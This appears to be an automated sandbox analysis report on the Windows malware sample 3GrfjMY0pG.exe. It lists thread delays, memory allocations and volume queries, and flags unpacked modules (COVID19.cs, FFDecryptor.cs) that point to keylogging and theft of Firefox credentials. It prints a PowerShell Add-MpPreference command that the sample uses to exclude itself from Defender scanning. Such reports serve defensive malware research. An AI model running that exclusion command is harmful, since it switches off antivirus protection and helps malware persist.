                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeMemory allocated: C720000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeMemory allocated: 1430000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeMemory allocated: 30C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeMemory allocated: 1690000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 599672Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 599435Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 599218Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 599109Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 598998Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 598890Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 598670Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 598562Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 598343Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 598234Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 598125Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 598015Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 597906Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 597796Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 597687Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 597578Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 597468Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 597359Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 597250Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 597140Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 597031Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 596921Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 596812Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 596703Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 596593Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 596484Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 596374Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 596265Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 596156Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 596047Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 595937Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 595828Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 595718Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 595609Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 595499Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 595390Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 595280Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 595171Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 595059Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 594950Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 594843Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 594734Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 594624Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 594515Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6646Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2957Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeWindow / User API: threadDelayed 1884Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeWindow / User API: threadDelayed 7970Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6792Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1092Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep count: 36 > 30Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -599890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6892Thread sleep count: 1884 > 30Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6892Thread sleep count: 7970 > 30Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -599781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -599672s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -599547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -599435s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -599328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -599218s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -599109s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -598998s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -598890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -598781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -598670s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -598562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -598453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -598343s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -598234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -598125s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -598015s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -597906s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -597796s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -597687s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -597578s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -597468s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -597359s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -597250s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -597140s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -597031s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -596921s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -596812s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -596703s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -596593s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -596484s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -596374s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -596265s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -596156s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -596047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -595937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -595828s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -595718s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -595609s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -595499s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -595390s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -595280s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -595171s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -595059s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -594950s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -594843s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -594734s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -594624s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exe TID: 6852Thread sleep time: -594515s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 1456Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 6768Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 599672Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 599435Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 599218Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 599109Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 598998Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 598890Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 598670Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 598562Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 598343Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 598234Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 598125Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 598015Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 597906Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 597796Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 597687Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 597578Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 597468Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 597359Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 597250Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 597140Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 597031Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 596921Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 596812Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 596703Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 596593Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 596484Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 596374Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 596265Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 596156Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 596047Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 595937Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 595828Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 595718Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 595609Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 595499Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 595390Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 595280Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 595171Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 595059Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 594950Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 594843Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 594734Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 594624Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeThread delayed: delay time: 594515Jump to behavior
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3609453878.00000000011F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll 18U
                Source: svchost.exe, 00000006.00000002.2850534308.0000017E6D653000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: svchost.exe, 00000006.00000002.2850071346.0000017E6802B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`Sem~
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C99548 LdrInitializeThunk,LdrInitializeThunk,5_2_06C99548
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe"
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe"Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe"Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess created: C:\Users\user\Desktop\3GrfjMY0pG.exe "C:\Users\user\Desktop\3GrfjMY0pG.exe"Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeQueries volume information: C:\Users\user\Desktop\3GrfjMY0pG.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
